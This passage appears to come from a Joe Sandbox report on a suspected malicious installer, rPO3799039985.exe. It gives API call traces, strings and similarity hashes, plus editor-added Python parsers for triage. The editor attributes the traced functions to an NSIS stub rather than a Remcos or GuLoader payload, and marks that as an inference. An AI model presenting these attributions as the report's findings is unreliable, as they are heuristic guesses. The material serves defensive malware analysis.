• DeleteObject.GDI32(?), ref: 00404009
• CreateBrushIndirect.GDI32(?), ref: 00404013
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
• Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
• GetMessagePos.USER32 ref: 00404836
• ScreenToClient.USER32(?,?), ref: 00404850
• SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
• Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• MulDiv.KERNEL32(000A7EB7,00000064,000A7EBB), ref: 00402BC5
• wsprintfA.USER32 ref: 00402BD5
• SetWindowTextA.USER32(?,?), ref: 00402BE5
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
Strings
• verifying installer: %d%%, xrefs: 00402BCF
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
• Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
• Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
• Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
APIs
• GetDC.USER32(?), ref: 00401D3B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
• ReleaseDC.USER32(?,00000000), ref: 00401D68
• CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Tahoma
• API String ID: 3808545654-3580928618
• Opcode ID: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
• Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
• Opcode Fuzzy Hash: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
• Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
• GlobalFree.KERNEL32(?), ref: 0040276F
• GlobalFree.KERNEL32(00000000), ref: 00402782
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
• Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
• Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
• Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
APIs
• lstrlenA.KERNEL32(Snik Setup: Completed,Snik Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
• wsprintfA.USER32 ref: 004047AF
• SetDlgItemTextA.USER32(?,Snik Setup: Completed), ref: 004047C2
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$Snik Setup: Completed
• API String ID: 3540041739-1446710981
• Opcode ID: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
• Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
• Opcode Fuzzy Hash: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
• Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
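The records above are the report's per-function API, string and similarity summaries for the sample's outer executable. Triage goes faster when they are parsed into rows rather than read one by one: the API list of each function, its strings, and its Opcode ID (which is stable across samples built from the same source) can then be filtered and cross-referenced. The following parser is an added example written by the editor; it is not Joe Sandbox tooling and not part of this report. The record text it embeds is a trimmed copy of three records shown on this page. The tags it assigns are the editor's own heuristics: the "nsis_stub" tag rests on the assumption that the strings "verifying installer: %d%%" and "%u.%u%s%s" identify NSIS installer-stub code (the report itself does not make that attribution), and "file_cleanup" simply flags functions that both close a handle and delete a file.

```python
"""Parse Joe Sandbox "Executed Functions" records into structured rows and tag them.

Added example, not Joe Sandbox tooling. The record text below is a trimmed copy
of three records from this report. The NSIS attribution used for tagging is the
editor's assumption from the strings, not a statement made by the report."""
import re
from typing import Dict, List, Set

# Constructed sample: three records from this report, whitespace and link text removed,
# long argument lists shortened.
SAMPLE = """\
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• MulDiv.KERNEL32(000A7EB7,00000064,000A7EBB), ref: 00402BC5
• wsprintfA.USER32 ref: 00402BD5
• SetWindowTextA.USER32(?,?), ref: 00402BE5
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
Strings
• verifying installer: %d%%, xrefs: 00402BCF
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
• Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
• GlobalFree.KERNEL32(?), ref: 0040276F
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
APIs
• lstrlenA.KERNEL32(Snik Setup: Completed,Snik Setup: Completed,?,%u.%u%s%s,00000005), ref: 004047A7
• wsprintfA.USER32 ref: 004047AF
• SetDlgItemTextA.USER32(?,Snik Setup: Completed), ref: 004047C2
Strings
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$Snik Setup: Completed
• Opcode ID: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
"""

# "• Name.MODULE(args), ref: 0040XXXX" or, with no argument list, "• Name.MODULE ref: 0040XXXX"
API_RE = re.compile(r"^• (\w+)\.(\w+)(?:\((.*)\),)? ref: ([0-9A-Fa-f]{8})$")
STR_RE = re.compile(r"^• (.*), xrefs: ([0-9A-Fa-f]{8})$")
KV_RE = re.compile(r"^• ([^:]+):\s*(.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Strings emitted by the NSIS installer stub. Editor's assumption: a function that
# references them belongs to the installer stub, not to the unpacked payload.
NSIS_STUB_STRINGS = {"verifying installer: %d%%", "%u.%u%s%s"}


def parse_records(text: str) -> List[Dict]:
    """Split report text into one dict per function: apis, strings, similarity."""
    records: List[Dict] = []
    section, cur = None, None
    for raw in text.splitlines():
        line = raw.strip().removesuffix("Download File").rstrip()  # drop link residue
        if line in SECTIONS:
            if line == "APIs":  # every record starts with its APIs block
                cur = {"apis": [], "strings": [], "similarity": {}}
                records.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("• "):
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur["apis"].append({"name": m[1], "module": m[2],
                                "args": m[3].split(",") if m[3] else [],
                                "ref": int(m[4], 16)})
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur["strings"].append(m[1])
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur["similarity"][m[1]] = m[2]
    return records


def all_strings(rec: Dict) -> Set[str]:
    """Strings from the Strings block plus the '$'-joined Similarity 'String ID' field."""
    sim = rec["similarity"].get("String ID", "")
    return set(rec["strings"]) | {s for s in sim.split("$") if s}


def tag_record(rec: Dict) -> Set[str]:
    """Editor's triage heuristics over one record."""
    names = {a["name"] for a in rec["apis"]}
    tags: Set[str] = set()
    if all_strings(rec) & NSIS_STUB_STRINGS:
        tags.add("nsis_stub")
    if {"DeleteFileA", "CloseHandle"} <= names:
        tags.add("file_cleanup")
    if any(a["module"] in ("USER32", "GDI32") for a in rec["apis"]):
        tags.add("gui")
    return tags


def index_by_opcode(records: List[Dict]) -> Dict[str, Dict]:
    """Opcode ID -> record, for matching functions across samples."""
    return {r["similarity"]["Opcode ID"]: r for r in records if "Opcode ID" in r["similarity"]}


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["similarity"].get("Opcode ID", "?")[:16],
              sorted(tag_record(rec)), [a["name"] for a in rec["apis"]])
```

Feed it the whole "Executed Functions" section of a report and filter out the functions tagged "nsis_stub" and "gui" to reach the code that matters; the Opcode ID index lets the same function be recognised in the next sample packed with the same installer.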
APIs
• SetWindowTextA.USER32(00000000,Snik Setup), ref: 00403A0C
Strings
Memory Dump Source
• Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
Similarity
• API ID: TextWindow
• String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$1033$Snik Setup$Snik Setup: Completed
                                                                                                                                                                                                          • API String ID: 530164218-3370705221
                                                                                                                                                                                                          • Opcode ID: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                                                                                                                          • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                          • Opcode ID: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                                                                                                          • Instruction ID: e0b40e6d550d0c6dedecb0be42375ee7245bd63e637183e656586a56a8cfacd8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7766ad722bcf743109a83c91df0766a7f4c549130a1e07b93abaa864288c9da4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66116D31A00108FEDF22AF90DE89EAA3B7DEB54349B104436FA01B10E0D774AE51DB69
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                                                                                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                          • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                                                                                                                          • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                          • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                                          • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                                                                                                                                          • lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1356686001-0
                                                                                                                                                                                                          • Opcode ID: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                                                                                                                                                                          • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2cc6d77e9ba14248a047d72dd7d9f6a3aa8facb63e6006dd0d76643cfd04d8e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
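The records above are the IDA plugin's per-function API traces for the dump at 00400000: each "APIs" bullet is one imported call with the argument values the plugin could recover (? where it could not) and the address of the call site. Read as sequences rather than single calls they are more telling: RegOpenKeyExA → RegEnumKeyA → RegDeleteKeyA (00402A9B..00402B23) is a recursive registry key delete; RegCreateKeyExA → RegSetValueExA → RegCloseKey (004023A2..004024D8) writes a registry value; lstrlenA → CharPrevA → lstrcatA appends a trailing separator to the Temp path; and the SendMessageA at 00401D1E passes message 00000172, which is STM_SETIMAGE (attach the bitmap just loaded by LoadImageA to a dialog control). Together with the "$1033$Snik Setup$Snik Setup: Completed" string (1033 is the en-US LCID), this looks like the installer stub's own UI and registry code rather than the Remcos or GuLoader payload, which is an inference from the strings and call patterns, not a finding stated by the report.

As an added example (not part of the Joe Sandbox report, and not tooling Joe Security ships), the following Python reads the "APIs" bullets of such records and tags these sequences, so that a triage script can flag registry-writing or key-deleting functions in a large report without reading every record. The excerpt it parses is copied from the four records above; the tag names are this example's own.

```python
import re
from dataclasses import dataclass, field

# One "APIs" bullet of a Joe Sandbox function record, e.g.
#   • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
API_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# The report's other section headers; bullets under them are not API calls.
OTHER_SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
STM_SETIMAGE = 0x0172  # user32 static-control message: attach a bitmap/icon to a control


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int  # call-site address from "ref:"


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)

    @property
    def start(self) -> int:
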